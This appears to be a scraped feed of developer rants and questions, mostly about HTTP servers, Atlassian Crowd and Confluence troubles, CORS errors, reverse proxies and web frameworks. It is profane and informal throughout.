It was reported some hours later, at like 3pm, as people could not login to the applications using crowd as authentication and authorization server.
Tried to debug the system, where nothing was did, to make it work. At best time to fail.
First workaround: if you are logged into one of the other applications of atlassian, just refresh the site, so your SSO token gets a refresh and you are signed on again.
Then I searched more and more. And more.
But nothing worked, nothing helped.
So I addressed an emergency maintenance, take down the whole Suite, restart crowd, to apply some changes to it's settings, not knowing what happening then, because all connections of SSO will then be released. Sent out the mail like 30 minutes beforehands.
While waiting for the window, I just typed my credentials... And redid, and redid, so to type and being bored.
Three minutes before the window...
It just worked again.
Well. Wtf. Serioudl
Just came back.
No Intrusion, no changes at all. Just came back, as nothing has happened.
Kind of best part of this story... A headhunter messaged me on my way home to offer me a job as an Atlassian Suite SysAdmin for a company, at kinda the double of my salary.
At first I was thinking to go there, and when someone then asked me sth about Atlassian just start to laugh and then leave still laughing...
But then I very nicely respond that I dont want to cry at work. And wished him best luck.
I am doing some bad upgrades now on our Suite. Very painful.
And I looked into the start scripts. Some Look like the untalented intern tells another one to write scripts. Seriously wtf.
Today I followed the guide to Update a confluence and change database to Postgres. Didnt work, Postgres error.
Try it again, jquery won't load. Next try, tomcat not starting anymore. Did same thing. Every fucking time.
Yea. Maintenance window to get a nice new export soon. Will only take an hour.
To switch database in confluence, you need to set it up very fresh. And then Import your export.
Export takes an hour at our system.
Importing maybe the same time. Hope it will work (hint: Nope).
Oh, can be nice also. Just tell the Bitbucket to migrate databases, there is a fucking setting for it. Enter new database, ready, go, finished.
At least they don't raise costs very much every kinda year.
Oh sorry, yes, they do.4 -
You know you are done when stackoverflow gives upon you: http://stackoverflow.com/questions/...
So I decided to run a scheduled job on the server just before everyone starts using the it. -
Show me how you made an http server with an arduino nano and an esp8266 via AT commands from the arduino, the arduino handling the clients.
No you didn't, this shit is fucking impossible.4 -
What's the best way to turn a phone into a dedicated http server? I have a useless android lying about. Wanna turn it into a server.
Linux tools on android? Or forget about android and install Linux on it from scratch? Which flavour?
Any tips?2 -
Fucking retard Liferay.....
At least 2 users (one inour team and another at client's) are claiming they've successfully opened a portlet view multiple times at day X. And a month later it stopped working.
I open up Liferay's (tomcat's) localhost_access.log and can see all the portlet requests at day X have returned http:400
Normally I would consider the human factor and rule this as a human error, assuming they were connected to another environment, another server, etc. But since this is The Fucking Liferay - I'm not that fast in trusting even logs :(
Who the fuck made this piece of shit....6 -
Oh yeah Google why don't you just change the parameter order of functions, remove entire functions between minor versions, and not put a single example on your API docs? And force devs to add 30 lines of boilerplate and start an http server so I can run the debugger? Fuck tensor flow, I'm moving to pytorch.2
-
https://i.imgflip.com/2i02zy.jpg
git branch -r
origin/204/match-dsteem-on-sign-transaction
origin/305-support-hive-legacy-api
origin/307-call-async
origin/72-http-socket-support
origin/HEAD -> origin/dev
origin/appbase-http
origin/chore/fix-ws
origin/default-server
but
git push --follow-tags https://github.com/lopudesigns/... --set-upstream origin dev
fatal: refs/remotes/origin/HEAD cannot be resolved to branch.
wut -
If your code is giving HTTP 500 error on a production server, go kill yourself, until you are having a development environment on the production server. In that case, kill your manager! 💢
-
!rant
If anyone has pretender.io experience with IBM http server (yeah, you read it right), would you be kind enough to share your Twitter handle for a quick chat? -
I created a Discord server which is focused on OpenBSD and thought that some of you might like to be some of the first -- or only -- members of this Discord server.
Suggestions for server improvements from those who do join would be appreciated.
One can join the Discord server by visiting http://discord.gg/zeGDz5.1 -
Is there a cloud service that does nothing but redirect incoming HTTP requests to your home server without the need to have a static IP or an open TCP port ? Sort of like proxy2
-
ant.design selectors are bogus garbage.
The drop-down selector that replaces the browser's native one does not allow typing to select an entry, meaning to select a language from a long list, one needs to manually scroll to it. If the scroll wheel of the mouse does not work properly, one needs to use the scroll bar, which is far too short to be able to conveniently scroll a long language list.
Sure, ant.design might look pretty (as advertised), and has oh-so-fancy features like fade in/out animations, but from an interaction point of view, that's as useless as the skeleton screens popularly used by JavaScript-based websites (which are anyway inferior in performance and compatibility compared to static HTML pages with JavaScript on top).
Not only can I not type-to-select, but the date selector on Dailymotion, which uses this utter garbage, sends "[object Object]" to the server, so the user is forced to edit the HTTP request manually. Complete utter garbage.
Don't use that shit. Use the browser's native feature. Or use something progressively enhancing like the drop-down menus used by MediaWiki on pages such as Special:Contributions, where it actually is properly implemented.2 -
!rant
TIL they created an open source e-mail protocol, JMAP (info at http://jmap.io), based on IMAP. The problem is, there is no client nor server that actually uses this. Do you know if they will ever develop one? -
Help
how to stop a Android phone from changing IPs
hey guys
Don't know why, sometimes my Android server changes IPs (without restart), that fucks the exit of services....
Like, don't know why, http always works even when IP changes
but WebDav stops working.... I mean, I can use inside the network but I want to access it from the outside.
Thanks8 -
Node server with webpack poly fill on embedded device. Why 😂 .
Replacing node-fetch with node http instead of waiting for native node fetch API. Why 😂
All npm scripts on package.json are dead. Why 😂
Node server is not even sharing TS interfaces with frontend.
Customers are complaining about MeM0r1 L3k and let's build more features on stupid node.
Fucking kill me.1 -
Is there any free software / database / API which can be used for something like get_maliciousness_score(request_method, url) => [0..1]?2
-
I kinda wonder why so few server frameworks have actually implemented the FastCGI spec, instead of running their own weaker HTTP server that needs to be put behind something like nginx for production anyways.
-
I tried Appgyver over christmas, since it promised easy front-end (no-)coding I was looking forward to getting rudimentary frontends done faster.
Well, the first real project that I wanted to start didn't compile anymore (internal error from the service), the page told me to reload and try again.
It failed again... And again.
Fine with me, I only spent 10 minutes on the project at this point.
I then searched for the bugreporting page and found it. The sad thing is that when I wanted to open a ticket the server crashed. It didn't even return a HTTP error, just a JSON saying there is a error and a GUID.
I have to say, if a Dev decided to have holidays without new issues that's one way of getting that done.3 -
Anyone here use the NodeJS HTTP/2 API? I started working with it the other day and I can get static files served fine with it but when I try and use it's push feature to "bundle" additional resources that the page will need, it doesn't seem to work, the client still requests the resources from the server instead of looking in the "push" cache. Also the load time seems longer when using http/2 vs 1, was wondering if anyone else had come across these issues and found workarounds. P.S. - I'm using Chrome to test on, with https://localhost and some self-signed certs as http/2 isn't implemented in browser unless using https1
-
¡¡Good news!! Finally solved the image upload problem with lumen and angular. It happens that, even the $request in Lumen was "empty" it turned out that the actual image file was a binary object inside the Lumen $request variable that didn't render because the browser, postman and everything I tried couldn't understand it (maybe something to do with the Content-Type). I figured out and solved it, now I can easily save, delete and even modify images when are in the server side.
One more thing... My code was fine the whole time, l mean like, 3 days of finding a big that doesn't exists haha
Everyday we learn some new si*t
For those who don't know what I'm talking about, the story is right here:
http://stackoverflow.com/questions/...
PS: thanks guys, I really appreciate your comments: @champion01 @itsdaniel0 @dfox @joetj3 -
Can somebody give working example how to solve
Access to XMLHttpRequest at 'localhost:8000/index.php/api/companies/1/logo' from origin 'http://localhost:8080' has been blocked by CORS policy: Cross origin requests are only supported for protocol schemes: http, data, chrome, chrome-extension, chrome-untrusted, https.
this error is talked so much but no working solution I can find. Maybe it is somewhere but cannot find so far in the internet trash.
Nginx server.
Not by installing chrome plugin, because other people would also need to install it. Thats not a solution.20 -
so I got the reverse proxy all set up on my server, forwarding all the right headers to enable SSL behind reverse proxy. awesome! my only problem remaining is, since nginx only handles HTTP/S traffic, I can't connect to my gitlab instance via ssh. anyone know how I can proxy this traffic as well to enable ssh connection for git?2
-
Is there anyway to post a data to a apache server without using headerless data? (A http packet without headers, just raw data string)